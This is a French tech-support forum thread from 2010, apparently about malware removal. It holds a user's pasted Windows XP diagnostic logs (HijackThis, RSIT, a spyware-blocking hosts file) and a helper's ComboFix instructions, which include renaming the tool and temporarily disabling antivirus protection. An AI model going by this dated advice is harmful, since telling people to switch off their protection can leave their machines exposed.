    Mise à jour de sécurité pour Windows XP (KB958644)-->"C:\WINDOWS\$NtUninstallKB958644$\spuninst\spuninst.exe"
    Mise à jour de sécurité pour Windows XP (KB958687)-->"C:\WINDOWS\$NtUninstallKB958687$\spuninst\spuninst.exe"
    Mise à jour pour Windows Internet Explorer 8 (KB968220)-->"C:\WINDOWS\ie8updates\KB968220-IE8\spuninst\spuninst.exe"
    Mise à jour pour Windows Internet Explorer 8 (KB976749)-->"C:\WINDOWS\ie8updates\KB976749-IE8\spuninst\spuninst.exe"
    Module de prise en charge linguistique de Microsoft .NET Framework 2.0 - FRA-->C:\WINDOWS\Microsoft.NET\Framework\v2.0.50727\Microsoft .NET Framework 2.0 Language Pack - FRA\install.exe
    Mozilla Firefox (3.0.12)-->C:\Program Files\Mozilla Firefox\uninstall\helper.exe
    MSVCRT-->MsiExec.exe /I{22B775E7-6C42-4FC5-8E10-9A5E3257BD94}
    MSXML 4.0 SP2 (KB927978)-->MsiExec.exe /I{37477865-A3F1-4772-AD43-AAFC6BCFF99F}
    MSXML 4.0 SP2 (KB936181)-->MsiExec.exe /I{C04E32E0-0416-434D-AFB9-6969D703A9EF}
    MSXML 4.0 SP2 (KB954430)-->MsiExec.exe /I{86493ADD-824D-4B8E-BD72-8C5DCDC52A71}
    MSXML 4.0 SP2 (KB973688)-->MsiExec.exe /I{F662A8E6-F4DC-41A2-901E-8C11F044BDEC}
    MSXML 4.0 SP2 Parser and SDK-->MsiExec.exe /I{716E0306-8318-4364-8B8F-0CC4E9376BAC}
    MSXML 4.0 SP3 Parser (KB973685)-->MsiExec.exe /I{859DFA95-E4A6-48CD-B88E-A3E483E89B44}
    MSXML 4.0 SP3 Parser-->MsiExec.exe /I{196467F1-C11F-4F76-858B-5812ADC83B94}
    MSXML 6 Service Pack 2 (KB954459)-->MsiExec.exe /I{97AA1F3C-DD64-4AA6-AEC5-F8F9F4CC21C5}
    NHL® 09-->MsiExec.exe /X{F2B5A2A7-2DF9-4361-8BD5-362714528B51}
    Nokia Connectivity Cable Driver-->MsiExec.exe /X{C3F19A5F-35A8-4FDB-A6ED-0F4CE398DA48}
    Notepad++-->C:\Program Files\Notepad++\uninstall.exe
    NVIDIA PhysX v8.04.25-->MsiExec.exe /X{74224F8D-4A17-4816-9EDB-7BB854DE532C}
    OCR Software by I.R.I.S 7.0-->C:\Program Files\HP\Digital Imaging\OCR\hpzscr01.exe -datfile hpqbud11.dat
    OpenMG Limited Patch 4.7-07-14-05-01-->C:\Program Files\Fichiers communs\Sony Shared\OpenMG\HotFixes\HotFix4.7-07-14-05-01\HotFixSetup\setup.exe /u
    OpenMG Secure Module 4.7.00-->C:\PROGRA~1\FICHIE~1\INSTAL~1\Driver\1150\INTEL3~1\IDriver.exe /M{CCD663AE-610D-4BDF-AAB0-E914B044527D} UNINSTALL
    OpenOffice.org 3.1-->MsiExec.exe /I{0FA44E79-CD7D-4E8D-A2EE-26FE05F509B6}
    OpenSSL 0.9.6m-->C:\OpenSSL\unins000.exe
    Outil de téléchargement Windows Live-->MsiExec.exe /I{205C6BDD-7B73-42DE-8505-9A093F35A238}
    Package de pilotes Windows - Nokia pccsmcfd (08/22/2008 7.0.0.0)-->C:\PROGRA~1\DIFX\270581355A767BF1\dpinst.exe /u C:\WINDOWS\system32\DRVSTORE\pccsmcfd_A3B3916E5D8138F59EE218321B27B044D3B18294\pccsmcfd.inf
    Patch Français-->"C:\Program Files\Half Life 2 Episode Two\fdf\unins000.exe"
    PC Connectivity Solution-->MsiExec.exe /I{83258E90-1F76-4E13-9F60-A0F8ED41E76F}
    Presto! BizCard 5 SE (Version Française)-->"C:\Program Files\InstallShield Installation Information\{FFF8B41E-FB72-4F03-B67E-DB2D5163694D}\setup.exe" -runfromtemp -l0x040c -uninst -removeonly
    PunkBuster Services-->C:\WINDOWS\system32\pbsvc.exe -u
    REALTEK GbE & FE Ethernet PCI-E NIC Driver-->C:\Program Files\InstallShield Installation Information\{C9BED750-1211-4480-B1A5-718A3BE15525}\setup.exe -runfromtemp -removeonly
    Realtek High Definition Audio Driver-->RunDll32 C:\PROGRA~1\FICHIE~1\INSTAL~1\PROFES~1\RunTime\11\50\Intel32\Ctor.dll,LaunchSetup "C:\Program Files\InstallShield Installation Information\{F132AF7F-7BCA-4EDE-8A7C-958108FE7DBC}\Setup.exe" -l0x40c -removeonly
    Réducteur de bruit lect. CD/DVD-->RunDll32 C:\PROGRA~1\FICHIE~1\INSTAL~1\engine\6\INTEL3~1\Ctor.dll,LaunchSetup "C:\Program Files\InstallShield Installation Information\{9FE35071-CAB2-4E79-93E7-BFC6A2DC5C5D}\Setup.exe" -l0x40c
    Return to Castle Wolfenstein-->"C:\Program Files\Steam\steam.exe" steam://uninstall/9010
    RICOH R5C83x/84x Flash Media Controller Driver Ver.3.51.01-->RunDll32 C:\PROGRA~1\FICHIE~1\INSTAL~1\PROFES~1\RunTime\0701\Intel32\Ctor.dll,LaunchSetup "C:\Program Files\InstallShield Installation Information\{59F6A514-9813-47A3-948C-8A155460CC2A}\setup.exe" -l0x40c anything
    Rockstar Games Social Club-->"C:\Program Files\InstallShield Installation Information\{08B3869E-D282-424C-9AFC-870E04A4BA14}\setup.exe" -runfromtemp -l0x040c -removeonly
    Segoe UI-->MsiExec.exe /I{A1F66FC9-11EE-4F2F-98C9-16F8D1E69FB7}
    SonicStage 4.3-->RunDll32 C:\PROGRA~1\FICHIE~1\INSTAL~1\PROFES~1\RunTime\10\01\Intel32\Ctor.dll,LaunchSetup "C:\Program Files\InstallShield Installation Information\{A0EB195B-5876-48E6-879D-33D4B2102610}\setup.exe" -l0x40c UNINSTALL -removeonly
    Spybot - Search & Destroy-->"C:\Program Files\Spybot - Search & Destroy\unins000.exe"
    Steam-->MsiExec.exe /X{048298C9-A4D3-490B-9FF9-AB023A9238F3}
    SUPER © Version 2009.bld.35 (Jan 5, 2009)-->C:\PROGRA~1\ERIGHT~1\SUPER\Setup.exe /remove /q0
    Synaptics Pointing Device Driver-->rundll32.exe "C:\Program Files\Synaptics\SynTP\SynISDLL.dll",standAloneUninstall
    System Requirements Lab-->MsiExec.exe /I{1E99F5D7-4262-4C7C-9135-F066E7485811}
    Tom Clancy's Ghost Recon Advanced Warfighter® 2-->"C:\Program Files\InstallShield Installation Information\{F78AC3C0-578C-49AB-BD4E-3107A6036A13}\Setup.exe" -runfromtemp -l0x040c -removeonly
    TOSHIBA ConfigFree-->RunDll32 C:\PROGRA~1\FICHIE~1\INSTAL~1\PROFES~1\RunTime\0701\Intel32\Ctor.dll,LaunchSetup "C:\Program Files\InstallShield Installation Information\{BDD83DC9-BEE9-4654-A5DA-CC46C250088D}\setup.exe" -l0x40c UNINSTALL
    TOSHIBA Direct Disc Writer-->MsiExec.exe /X{400830CA-F056-4BBE-80A3-9DF9CA4FB889}
    TOSHIBA Disc Creator-->MsiExec.exe /X{5DA0E02F-970B-424B-BF41-513A5018E4C0}
    TOSHIBA Hotkey Utility-->RunDll32 C:\PROGRA~1\FICHIE~1\INSTAL~1\PROFES~1\RunTime\09\01\Intel32\Ctor.dll,LaunchSetup "C:\Program Files\InstallShield Installation Information\{07F58BB0-50D4-4477-B491-A97B2AD059B6}\setup.exe" -l0x40c
    Toshiba Online Product Information-->C:\Program Files\InstallShield Installation Information\{2290A680-4083-410A-ADCC-7092C67FC052}\setup.exe -runfromtemp -l0x040c -removeonly
    TOSHIBA SD Memory Utilities-->MsiExec.exe /X{EBFF48F5-3CFA-436F-8FD5-94FB01D3A0A7}
    TOSHIBA Software Modem-->Tosmreg -U
    TOSHIBA TouchPad ON/Off Utility-->RunDll32 C:\PROGRA~1\FICHIE~1\INSTAL~1\PROFES~1\RunTime\09\01\Intel32\Ctor.dll,LaunchSetup "C:\Program Files\InstallShield Installation Information\{C02A6D5F-0FE1-46DE-B483-2BD33A226BCF}\setup.exe" -l0x40c
    TOSHIBA Utilities-->RunDll32 C:\PROGRA~1\FICHIE~1\INSTAL~1\PROFES~1\RunTime\09\01\Intel32\Ctor.dll,LaunchSetup "C:\Program Files\InstallShield Installation Information\{61B84435-7A82-4F5C-87EC-1071EC28D72D}\setup.exe" -l0x40c
    TuneUp Utilities-->C:\Program Files\TuneUp Utilities 2010\TUInstallHelper.exe --Trigger-Uninstall
    Ultra AVI Converter 5.2.0102-->"C:\Program Files\Ultra AVI Converter\unins000.exe"
    Unlocker 1.8.7-->C:\Program Files\Unlocker\uninst.exe
    Update for Microsoft .NET Framework 3.5 SP1 (KB963707)-->C:\WINDOWS\system32\msiexec.exe /package {CE2CDD62-0124-36CA-84D3-9F4DCF5C5BD9} /uninstall {B2AE9C82-DC7B-3641-BFC8-87275C4F3607} /qb+ REBOOTPROMPT=""
    Utilitaire de zoom TOSHIBA-->RunDll32 C:\PROGRA~1\FICHIE~1\INSTAL~1\PROFES~1\RunTime\10\50\Intel32\Ctor.dll,LaunchSetup "C:\Program Files\InstallShield Installation Information\{64212898-097F-4F3F-AECA-6D34A7EF82DF}\setup.exe" -l0x40c -removeonly
    VLC media player 0.9.8a-->C:\Program Files\VideoLAN\VLC\uninstall.exe
    Wallpaper-->C:\Program Files\Wallpaper\uninst.exe
    WBFS Manager 3.0-->C:\Program Files\WBFS\WBFS Manager 3.0\uninstall.exe
    Windows Internet Explorer 8-->"C:\WINDOWS\ie8\spuninst\spuninst.exe"
    Windows Live Call-->MsiExec.exe /I{82C7B308-0BDD-49D8-8EA5-9CD3A3F9DF41}
    Windows Live Communications Platform-->MsiExec.exe /I{ED00D08A-3C5F-488D-93A0-A04F21F23956}
    Windows Live Messenger-->MsiExec.exe /X{770F1BEC-2871-4E70-B837-FB8525FFA3B1}
    Windows Media Format 11 runtime-->"C:\Program Files\Windows Media Player\wmsetsdk.exe" /UninstallAll
    Windows Media Format 11 runtime-->"C:\WINDOWS\$NtUninstallWMFDist11$\spuninst\spuninst.exe"
    Windows Media Player 11-->"C:\WINDOWS\$NtUninstallwmp11$\spuninst\spuninst.exe"
    World in Conflict-->C:\Program Files\InstallShield Installation Information\{F11ADC64-C89E-47F4-A0B3-3665FF859397}\setup.exe -runfromtemp -l0x0009 -removeonly
    XML Paper Specification Shared Components Language Pack 1.0-->"C:\WINDOWS\$NtUninstallXPSEPSCLP$\spuninst\spuninst.exe"

    ======Hosts File======

    127.0.0.1 localhost
    127.0.0.1 www.007guard.com
    127.0.0.1 007guard.com
    127.0.0.1 008i.com
    127.0.0.1 www.008k.com
    127.0.0.1 008k.com
    127.0.0.1 www.00hq.com
    127.0.0.1 00hq.com
    127.0.0.1 010402.com
    127.0.0.1 www.032439.com

    ======Security center information======

    AV: avast! antivirus 4.8.1368 [VPS 100117-1]

    ======System event log======

    Computer Name: THIBAUT
    Event Code: 7036
    Message: Le service est entré dans l'état : Intel(R) PRO/Wireless 3945BG Network Connection.

    Record Number: 37193
    Source Name: NETw4x32
    Time Written: 20091230114626.000000+060
    Event Type: Informations
    User:

    Computer Name: THIBAUT
    Event Code: 8033
    Message: L'explorateur a forcé une élection sur le réseau \Device\NetBT_Tcpip_{3C86DC11-D9CD-4C9F-88A2-769873586B4F} car un maître explorateur a été arrêté.

    Record Number: 37192
    Source Name: BROWSER
    Time Written: 20091230114624.000000+060
    Event Type: Informations
    User:

    Computer Name: THIBAUT
    Event Code: 7036
    Message: Le service HTTP SSL est entré dans l'état : en cours d'exécution.

    Record Number: 37191
    Source Name: Service Control Manager
    Time Written: 20091230114558.000000+060
    Event Type: Informations
    User:

    Computer Name: THIBAUT
    Event Code: 7035
    Message: Un contrôle Démarrer a correctement été envoyé au service HTTP SSL.

    Record Number: 37190
    Source Name: Service Control Manager
    Time Written: 20091230114558.000000+060
    Event Type: Informations
    User: AUTORITE NT\SERVICE LOCAL

    Computer Name: THIBAUT
    Event Code: 7036
    Message: Le service Service de la passerelle de la couche Application est entré dans l'état : en cours d'exécution.

    Record Number: 37189
    Source Name: Service Control Manager
    Time Written: 20091230114548.000000+060
    Event Type: Informations
    User:

    =====Application event log=====

    Computer Name: THIBAUT
    Event Code: 1005
    Message: Windows Installer a initié un redémarrage système afin de terminer ou de continuer la configuration de 'Microsoft .NET Framework 2.0 Service Pack 2'.

    Record Number: 7232
    Source Name: MsiInstaller
    Time Written: 20091110174911.000000+060
    Event Type: Informations
    User: THIBAUT\thibaut

    Computer Name: THIBAUT
    Event Code: 11728
    Message: Produit : Microsoft .NET Framework 2.0 Service Pack 2 -- La configuration s'est terminée correctement.

    Record Number: 7231
    Source Name: MsiInstaller
    Time Written: 20091110174911.000000+060
    Event Type: Informations
    User: THIBAUT\thibaut

    Computer Name: THIBAUT
    Event Code: 1022
    Message: Produit : Microsoft .NET Framework 2.0 Service Pack 2 - La mise à jour 'KB974417' a été installée.

    Record Number: 7230
    Source Name: MsiInstaller
    Time Written: 20091110174911.000000+060
    Event Type: Informations
    User: THIBAUT\thibaut

    Computer Name: THIBAUT
    Event Code: 1002
    Message: Les compteurs de performances pour le service .NETFramework (.NETFramework) existent déjà dans le Registre
    des performances. Il n'est pas nécessaire de les réinstaller.

    Record Number: 7229
    Source Name: LoadPerf
    Time Written: 20091110174910.000000+060
    Event Type: Informations
    User:

    Computer Name: THIBAUT
    Event Code: 1002
    Message: Les compteurs de performances pour le service .NET CLR Data (.NET CLR Data) existent déjà dans le Registre
    des performances. Il n'est pas nécessaire de les réinstaller.

    Record Number: 7228
    Source Name: LoadPerf
    Time Written: 20091110174910.000000+060
    Event Type: Informations
    User:

    ======Environment variables======

    "ComSpec"=%SystemRoot%\system32\cmd.exe
    "Path"=C:\Program Files\PC Connectivity Solution\;C:\WINDOWS\system32;C:\WINDOWS;C:\WINDOWS\System32\Wbem;C:\Program Files\ATI Technologies\ATI.ACE\Core-StaticC:\Program Files\DMV\MaxTV4\plugins;C:\Program Files\IVT Corporation\BlueSoleil\Mobile;C:\Program Files\ATI Technologies\ATI.ACE\Core-Static
    "windir"=%SystemRoot%
    "FP_NO_HOST_CHECK"=NO
    "OS"=Windows_NT
    "PROCESSOR_ARCHITECTURE"=x86
    "PROCESSOR_LEVEL"=6
    "PROCESSOR_IDENTIFIER"=x86 Family 6 Model 15 Stepping 13, GenuineIntel
    "PROCESSOR_REVISION"=0f0d
    "NUMBER_OF_PROCESSORS"=2
    "PATHEXT"=.COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH
    "TEMP"=%SystemRoot%\TEMP
    "TMP"=%SystemRoot%\TEMP
    "OPENSSL_CONF"=C:\OpenSSL\bin\openssl.cnf
    "RGSCLauncher"=C:\Program Files\Rockstar Games\Rockstar Games Social Club
    "RGSC"=C:\Program Files\Rockstar Games\Rockstar Games Social Club\1_0_0_0
    "tvdumpflags"=8

    -----------------EOF-----------------
    0
  4. furfande
     
    Logfile of random's system information tool 1.06 (written by random/random)
    Run by thibaut at 2010-01-17 19:06:58
    Microsoft Windows XP Professionnel Service Pack 3
    System drive C: has 142 GB (46%) free of 305 GB
    Total RAM: 3070 MB (80% free)

    Logfile of Trend Micro HijackThis v2.0.2
    Scan saved at 19:07:03, on 17/01/2010
    Platform: Windows XP SP3 (WinNT 5.01.2600)
    MSIE: Internet Explorer v8.00 (8.00.6001.18702)
    Boot mode: Normal

    Running processes:
    C:\WINDOWS\System32\smss.exe
    C:\WINDOWS\system32\winlogon.exe
    C:\WINDOWS\system32\services.exe
    C:\WINDOWS\system32\lsass.exe
    C:\WINDOWS\system32\Ati2evxx.exe
    C:\WINDOWS\system32\svchost.exe
    C:\WINDOWS\System32\svchost.exe
    C:\WINDOWS\system32\Ati2evxx.exe
    C:\Program Files\Alwil Software\Avast4\aswUpdSv.exe
    C:\Program Files\Alwil Software\Avast4\ashServ.exe
    C:\WINDOWS\Explorer.EXE
    C:\Program Files\Toshiba\Toshiba Applet\thotkey.exe
    C:\WINDOWS\system32\TPSMain.exe
    C:\PROGRA~1\ALWILS~1\Avast4\ashDisp.exe
    C:\Program Files\TOSHIBA\TOSHIBA Direct Disc Writer\ddwmon.exe
    C:\Program Files\Synaptics\SynTP\SynTPEnh.exe
    C:\WINDOWS\RTHDCPL.EXE
    C:\WINDOWS\system32\ctfmon.exe
    C:\WINDOWS\system32\TPSBattM.exe
    C:\Program Files\Google\GoogleToolbarNotifier\GoogleToolbarNotifier.exe
    C:\WINDOWS\system32\spoolsv.exe
    C:\WINDOWS\system32\agrsmsvc.exe
    C:\Program Files\IVT Corporation\BlueSoleil\BlueSoleilCS.exe
    C:\Program Files\IVT Corporation\BlueSoleil\BsMobileCS.exe
    C:\Program Files\TOSHIBA\ConfigFree\CFSvcs.exe
    C:\Program Files\Java\jre6\bin\jqs.exe
    C:\WINDOWS\system32\IoctlSvc.exe
    C:\WINDOWS\system32\HPZipm12.exe
    C:\WINDOWS\system32\PnkBstrA.exe
    C:\WINDOWS\system32\PnkBstrB.exe
    C:\WINDOWS\system32\svchost.exe
    C:\Program Files\Toshiba\TOSHIBA Applet\TAPPSRV.exe
    C:\WINDOWS\system32\TODDSrv.exe
    C:\Program Files\TuneUp Utilities 2010\TuneUpUtilitiesService32.exe
    C:\Program Files\Alwil Software\Avast4\ashMaiSv.exe
    C:\Program Files\TuneUp Utilities 2010\TuneUpUtilitiesApp32.exe
    C:\Program Files\Alwil Software\Avast4\ashWebSv.exe
    C:\Program Files\IVT Corporation\BlueSoleil\BsHelpCS.exe
    C:\WINDOWS\system32\wbem\wmiapsrv.exe
    C:\WINDOWS\System32\svchost.exe
    C:\Program Files\Internet Explorer\IEXPLORE.EXE
    C:\Program Files\Internet Explorer\IEXPLORE.EXE
    C:\Documents and Settings\thibaut\Bureau\RSIT.exe
    C:\Program Files\Trend Micro\HijackThis\thibaut.exe

    R0 - HKCU\Software\Microsoft\Internet Explorer\Main,Start Page = http://go.microsoft.com/fwlink/?LinkId=69157
    R1 - HKLM\Software\Microsoft\Internet Explorer\Main,Default_Page_URL = http://go.microsoft.com/fwlink/?LinkId=69157
    R1 - HKLM\Software\Microsoft\Internet Explorer\Main,Default_Search_URL = http://go.microsoft.com/fwlink/?LinkId=54896
    R1 - HKLM\Software\Microsoft\Internet Explorer\Main,Search Page = http://go.microsoft.com/fwlink/?LinkId=54896
    R0 - HKCU\Software\Microsoft\Internet Explorer\Toolbar,LinksFolderName = Liens
    O2 - BHO: Adobe PDF Reader Link Helper - {06849E9F-C8D7-4D59-B87D-784B7D6BE0B3} - C:\Program Files\Adobe\Acrobat 7.0\ActiveX\AcroIEHelper.dll
    O2 - BHO: Spybot-S&D IE Protection - {53707962-6F74-2D53-2644-206D7942484F} - C:\PROGRA~1\SPYBOT~1\SDHelper.dll
    O2 - BHO: Programme d'aide de l'Assistant de connexion Windows Live - {9030D464-4C02-4ABF-8ECC-5164760863C6} - C:\Program Files\Fichiers communs\Microsoft Shared\Windows Live\WindowsLiveLogin.dll
    O2 - BHO: Google Toolbar Helper - {AA58ED58-01DD-4d91-8333-CF10577473F7} - c:\program files\google\googletoolbar1.dll
    O2 - BHO: Google Toolbar Notifier BHO - {AF69DE43-7D58-4638-B6FA-CE66B5AD205D} - C:\Program Files\Google\GoogleToolbarNotifier\5.4.4525.1752\swg.dll
    O2 - BHO: MegaIEMn - {bf00e119-21a3-4fd1-b178-3b8537e75c92} - C:\Program Files\Megaupload\Mega Manager\MegaIEMn.dll
    O2 - BHO: FDMIECookiesBHO Class - {CC59E0F9-7E43-44FA-9FAA-8377850BF205} - C:\Program Files\Free Download Manager\iefdm2.dll
    O2 - BHO: Java(tm) Plug-In 2 SSV Helper - {DBC80044-A445-435b-BC74-9C25C1C588A9} - C:\Program Files\Java\jre6\bin\jp2ssv.dll
    O2 - BHO: JQSIEStartDetectorImpl - {E7E6F031-17CE-4C07-BC86-EABFE594F69C} - C:\Program Files\Java\jre6\lib\deploy\jqs\ie\jqs_plugin.dll
    O3 - Toolbar: &Google - {2318C2B1-4965-11d4-9B18-009027A5CD4F} - c:\program files\google\googletoolbar1.dll
    O3 - Toolbar: DAEMON Tools Toolbar - {32099AAC-C132-4136-9E9A-4E364A424E17} - C:\Program Files\DAEMON Tools Toolbar\DTToolbar.dll
    O4 - HKLM\..\Run: [THotkey] C:\Program Files\Toshiba\Toshiba Applet\thotkey.exe
    O4 - HKLM\..\Run: [TPSMain] TPSMain.exe
    O4 - HKLM\..\Run: [avast!] C:\PROGRA~1\ALWILS~1\Avast4\ashDisp.exe
    O4 - HKLM\..\Run: [DDWMon] C:\Program Files\TOSHIBA\TOSHIBA Direct Disc Writer\\ddwmon.exe
    O4 - HKLM\..\Run: [SynTPEnh] C:\Program Files\Synaptics\SynTP\SynTPEnh.exe
    O4 - HKLM\..\Run: [RTHDCPL] RTHDCPL.EXE
    O4 - HKCU\..\Run: [MsnMsgr] "C:\Program Files\Windows Live\Messenger\msnmsgr.exe" /background
    O4 - HKCU\..\Run: [ctfmon.exe] C:\WINDOWS\system32\ctfmon.exe
    O4 - HKCU\..\Run: [uTorrent] "C:\Program Files\uTorrent\uTorrent.exe"
    O4 - HKCU\..\Run: [swg] "C:\Program Files\Google\GoogleToolbarNotifier\GoogleToolbarNotifier.exe"
    O4 - HKUS\S-1-5-19\..\Run: [CTFMON.EXE] C:\WINDOWS\system32\CTFMON.EXE (User 'SERVICE LOCAL')
    O4 - HKUS\S-1-5-20\..\Run: [CTFMON.EXE] C:\WINDOWS\system32\CTFMON.EXE (User 'SERVICE RÉSEAU')
    O4 - HKUS\S-1-5-18\..\Run: [CTFMON.EXE] C:\WINDOWS\system32\CTFMON.EXE (User 'SYSTEM')
    O4 - HKUS\.DEFAULT\..\Run: [CTFMON.EXE] C:\WINDOWS\system32\CTFMON.EXE (User 'Default user')
    O8 - Extra context menu item: E&xporter vers Microsoft Excel - res://C:\PROGRA~1\MICROS~2\Office12\EXCEL.EXE/3000
    O8 - Extra context menu item: Envoyer via Bluetooth - C:\Program Files\IVT Corporation\BlueSoleil\TransSend\IE\tsinfo.htm
    O8 - Extra context menu item: Envoyer via message(&M)... - C:\Program Files\IVT Corporation\BlueSoleil\TransSend\IE\tssms.htm
    O8 - Extra context menu item: Liens de téléchargement avec Mega Manager... - C:\PROGRA~1\MEGAUP~1\MEGAMA~1\mm_file.htm
    O8 - Extra context menu item: Tout télécharger avec Free Download Manager - file://C:\Program Files\Free Download Manager\dlall.htm
    O8 - Extra context menu item: Télécharger avec Free Download Manager - file://C:\Program Files\Free Download Manager\dllink.htm
    O8 - Extra context menu item: Télécharger la sélection avec Free Download Manager - file://C:\Program Files\Free Download Manager\dlselected.htm
    O8 - Extra context menu item: Télécharger la vidéo avec Free Download Manager - file://C:\Program Files\Free Download Manager\dlfvideo.htm
    O9 - Extra button: (no name) - {DFB852A3-47F8-48C4-A200-58CAB36FD2A2} - C:\PROGRA~1\SPYBOT~1\SDHelper.dll
    O9 - Extra 'Tools' menuitem: Spybot - Search & Destroy Configuration - {DFB852A3-47F8-48C4-A200-58CAB36FD2A2} - C:\PROGRA~1\SPYBOT~1\SDHelper.dll
    O9 - Extra button: (no name) - {e2e2dd38-d088-4134-82b7-f2ba38496583} - C:\WINDOWS\Network Diagnostic\xpnetdiag.exe
    O9 - Extra 'Tools' menuitem: @xpsp3res.dll,-20001 - {e2e2dd38-d088-4134-82b7-f2ba38496583} - C:\WINDOWS\Network Diagnostic\xpnetdiag.exe
    O16 - DPF: {40F576AD-8680-4F9E-9490-99D069CD665F} (System Requirements Lab Class) - http://srtest-cdn.systemrequirementslab.com.s3.amazonaws.com/bin/sysreqlabdetect.cab
    O16 - DPF: {5D6F45B3-9043-443D-A792-115447494D24} (UnoCtrl Class) - http://messenger.zone.msn.com/...
    O16 - DPF: {867E13F2-7F31-44FB-AC97-CD38E0DC46EF} (Ma-Config control) - http://fichiers.touslesdrivers.com/maconfig/MaConfig_4_0_1_2.cab
    O16 - DPF: {C3F79A2B-B9B4-4A66-B012-3EE46475B072} (MessengerStatsClient Class) - http://messenger.zone.msn.com/binary/MessengerStatsPAClient.cab56907.cab
    O16 - DPF: {D27CDB6E-AE6D-11CF-96B8-444553540000} (Shockwave Flash Object) - http://fpdownload2.macromedia.com/get/shockwave/cabs/flash/swflash.cab
    O16 - DPF: {E2883E8F-472F-4FB0-9522-AC9BF37916A7} - http://platformdl.adobe.com/NOS/getPlusPlus/1.6/gp.cab
    O18 - Protocol: skype4com - {FFC8B962-9B40-4DFF-9458-1830C7DD7F5D} - C:\WINDOWS\system32\skype4com.dll
    O23 - Service: Agere Modem Call Progress Audio (AgereModemAudio) - Agere Systems - C:\WINDOWS\system32\agrsmsvc.exe
    O23 - Service: avast! iAVS4 Control Service (aswUpdSv) - ALWIL Software - C:\Program Files\Alwil Software\Avast4\aswUpdSv.exe
    O23 - Service: Ati HotKey Poller - ATI Technologies Inc. - C:\WINDOWS\system32\Ati2evxx.exe
    O23 - Service: avast! Antivirus - ALWIL Software - C:\Program Files\Alwil Software\Avast4\ashServ.exe
    O23 - Service: avast! Mail Scanner - ALWIL Software - C:\Program Files\Alwil Software\Avast4\ashMaiSv.exe
    O23 - Service: avast! Web Scanner - ALWIL Software - C:\Program Files\Alwil Software\Avast4\ashWebSv.exe
    O23 - Service: BlueSoleilCS - Unknown owner - C:\Program Files\IVT Corporation\BlueSoleil\BlueSoleilCS.exe
    O23 - Service: BsHelpCS - Unknown owner - C:\Program Files\IVT Corporation\BlueSoleil\BsHelpCS.exe
    O23 - Service: BsMobileCS - Unknown owner - C:\Program Files\IVT Corporation\BlueSoleil\BsMobileCS.exe
    O23 - Service: ConfigFree Service (CFSvcs) - TOSHIBA CORPORATION - C:\Program Files\TOSHIBA\ConfigFree\CFSvcs.exe
    O23 - Service: FLEXnet Licensing Service - Acresso Software Inc. - C:\Program Files\Fichiers communs\Macrovision Shared\FLEXnet Publisher\FNPLicensingService.exe
    O23 - Service: Google Updater Service (gusvc) - Google - C:\Program Files\Google\Common\Google Updater\GoogleUpdaterService.exe
    O23 - Service: InstallDriver Table Manager (IDriverT) - Macrovision Corporation - C:\Program Files\Fichiers communs\InstallShield\Driver\1150\Intel 32\IDriverT.exe
    O23 - Service: Java Quick Starter (JavaQuickStarterService) - Sun Microsystems, Inc. - C:\Program Files\Java\jre6\bin\jqs.exe
    O23 - Service: Ma-Config Service (maconfservice) - CybelSoft - C:\Program Files\ma-config.com\maconfservice.exe
    O23 - Service: MSCSPTISRV - Sony Corporation - C:\Program Files\Fichiers communs\Sony Shared\AVLib\MSCSPTISRV.exe
    O23 - Service: PACSPTISVR - Unknown owner - C:\Program Files\Fichiers communs\Sony Shared\AVLib\PACSPTISVR.exe
    O23 - Service: PLFlash DeviceIoControl Service - Prolific Technology Inc. - C:\WINDOWS\system32\IoctlSvc.exe
    O23 - Service: Pml Driver HPZ12 - HP - C:\WINDOWS\system32\HPZipm12.exe
    O23 - Service: PnkBstrA - Unknown owner - C:\WINDOWS\system32\PnkBstrA.exe
    O23 - Service: PnkBstrB - Unknown owner - C:\WINDOWS\system32\PnkBstrB.exe
    O23 - Service: ServiceLayer - Nokia. - C:\Program Files\PC Connectivity Solution\ServiceLayer.exe
    O23 - Service: SonicStage Back-End Service - Sony Corporation - C:\Program Files\Fichiers communs\Sony Shared\AVLib\SsBeSvc.exe
    O23 - Service: Sony SPTI Service (SPTISRV) - Sony Corporation - C:\Program Files\Fichiers communs\Sony Shared\AVLib\SPTISRV.exe
    O23 - Service: SonicStage SCSI Service (SSScsiSV) - Sony Corporation - C:\Program Files\Fichiers communs\Sony Shared\AVLib\SSScsiSV.exe
    O23 - Service: TOSHIBA Application Service (TAPPSRV) - TOSHIBA Corp. - C:\Program Files\Toshiba\TOSHIBA Applet\TAPPSRV.exe
    O23 - Service: TOSHIBA Optical Disc Drive Service (TODDSrv) - TOSHIBA Corporation - C:\WINDOWS\system32\TODDSrv.exe
    O23 - Service: TuneUp Drive Defrag Service (TuneUp.Defrag) - TuneUp Software - C:\Program Files\TuneUp Utilities 2010\TuneUpDefragService.exe
    O23 - Service: TuneUp Utilities Service (TuneUp.UtilitiesSvc) - TuneUp Software - C:\Program Files\TuneUp Utilities 2010\TuneUpUtilitiesService32.exe
    O24 - Desktop Component 0: (no name) - http://media.cnetnetworks.fr/...
    0
    1. Utilisateur anonyme
       
      Re

      Télécharge combofix : http://download.bleepingcomputer.com/sUBs/ComboFix.exe
      Ou ici : https://forospyware.com
      >Renomme le pour l’enregistrer sur ton bureau en asdehi (tout simplement pour que l’infection ne le contre pas)
      -> Double clique combofix.exe.
      -> Tape sur la touche 1 (Yes) pour démarrer le scan.
      -> Lorsque le scan sera complété, un rapport apparaîtra. Copie/colle ce rapport dans ta prochaine réponse.

      NOTE : Le rapport se trouve également ici : C:\Combofix.txt

      Avant d'utiliser ComboFix :

      -> Déconnecte toi d'Internet et referme les fenêtres de tous les programmes en cours.

      -> Désactive provisoirement et seulement le temps de l'utilisation de ComboFix, la protection en temps réel de ton Antivirus et de tes Antispywares, qui peuvent gêner fortement la procédure de recherche et de nettoyage de l'outil.

      Une fois fait, sur ton bureau double-clic sur Combofix.exe.

      - Répond oui au message d'avertissement, pour que le programme commence à procéder à l'analyse du pc.

      - Attention Pendant la durée de cette étape, ne te sert pas du pc et n'ouvre aucun programme. Risque de figer l'ordinateur

      - En fin de scan il est possible que ComboFix ait besoin de redémarrer le pc pour finaliser la désinfection\recherche, laisses-le faire.

      - Un rapport s'ouvrira ensuite dans le bloc notes, ce fichier rapport Combofix.txt, est automatiquement sauvegardé et rangé à C:\Combofix.txt)

      -> Réactive la protection en temps réel de ton Antivirus et de tes Antispywares, avant de te reconnecter à internet.

      -> Reviens sur le forum, et copie et colle la totalité du contenu de C:\Combofix.txt dans ton prochain message.

